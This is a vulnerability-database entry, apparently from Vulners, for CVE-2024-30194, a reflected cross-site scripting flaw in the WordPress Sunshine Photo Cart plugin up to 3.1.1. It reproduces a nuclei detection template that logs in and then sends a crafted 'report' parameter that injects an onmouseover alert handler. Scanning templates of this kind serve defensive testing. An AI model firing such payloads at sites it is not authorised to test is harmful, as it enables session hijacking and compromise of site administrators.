Lucene search
K

Sunshine Photo Cart <= 3.1.1 - Reflected Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

Sunshine Photo Cart up to 3.1.1 has a reflected cross-site scripting flaw enabling script execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-30194
3 Jan 202621:50
circl
CNNVD
WordPress Plugin Sunshine Photo Cart 跨站脚本漏洞
27 Mar 202400:00
cnnvd
CVE
CVE-2024-30194
27 Mar 202406:40
cve
Cvelist
CVE-2024-30194 WordPress Sunshine Photo Cart plugin <= 3.1.1 - Reflected Cross Site Scripting (XSS) vulnerability
27 Mar 202406:40
cvelist
EUVD
EUVD-2024-28126
3 Oct 202520:07
euvd
NVD
CVE-2024-30194
27 Mar 202407:15
nvd
OSV
CVE-2024-30194
27 Mar 202407:15
osv
Patchstack
WordPress Sunshine Photo Cart Plugin <= 3.1.1 is vulnerable to Cross Site Scripting (XSS)
25 Mar 202400:00
patchstack
Positive Technologies
PT-2024-23242
26 Mar 202400:00
ptsecurity
RedhatCVE
CVE-2024-30194
5 Feb 202509:41
redhatcve
Rows per page
id: CVE-2024-30194

info:
  name: Sunshine Photo Cart <= 3.1.1 - Reflected Cross-Site Scripting
  author: 0xanis
  severity: medium
  description: |
    WP Sunshine Sunshine Photo Cart versions up to 3.1.1 contain a cross-site scripting caused by improper neutralization of input during web page generation, letting attackers execute malicious scripts in users' browsers, exploit requires attacker to craft malicious input.
  impact: |
    Attackers can execute malicious scripts in users' browsers, leading to session hijacking, defacement, or redirection.
  remediation: |
    Update to the latest version of Sunshine Photo Cart.
  reference:
    - https://wpscan.com/vulnerability/8fe6645b-c11d-4075-89c1-f6a01dfb3a0e/
    - https://patchstack.com/database/vulnerability/sunshine-photo-cart/wordpress-sunshine-photo-cart-plugin-3-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30194
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-30194
    epss-score: 0.00727
    epss-percentile: 0.49698
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: wpsunshine
    product: sunshine-photo-cart
    framework: wordpress
  tags: cve,cve2024,wordpress,wp-plugin,xss,sunshine-photo-cart,authenticated,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP+Cookie+check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(tolower(all_headers), "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=sunshine-gallery&page=sunshine-reports&report=orders%22%20onmouseover=alert(document.domain)%3Bthis.remove()%3B%20style=position:fixed%3Bleft:0%3Btop:0%3Bwidth:100vw%3Bheight:100vh%3B HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "onmouseover=alert(document.domain);this.remove(); style=position:fixed;left:0;top:0;width:100vw;height:100vh;", "Sunshine Photo Cart")'
        condition: and
# digest: 4a0a00473045022037a1b209d91c400859ee575a2122385c81395c7083d1ebcae73259773290f9ba022100ac46c1930c7394888f0d1a02de00d8dc392c165f138b4a866689a2b908352200:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1 - 7.1
EPSS0.00727
SSVC
7